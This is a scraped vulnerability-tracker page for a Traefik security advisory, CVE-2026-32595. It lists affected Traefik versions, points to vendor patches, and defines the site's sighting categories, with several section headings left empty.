Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

Impacted products

Vendor	Product	Description
Traefik	Traefik	Traefik versions v3.7.0-ea.x antérieures à v3.7.0-ea.2
Traefik	Traefik	Traefik versions v3.6.x antérieures à v3.6.11
Traefik	Traefik	Traefik versions antérieures à v2.11.41

References

Title

Publication Time

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-32595 (GCVE-0-2026-32595)

FKIE_CVE-2026-32595

GHSA-G3HG-J4JV-CWFR

Summary

Patches

For more information

CERTFR-2026-AVI-0333

Solutions

Tags

Sightings

Nomenclature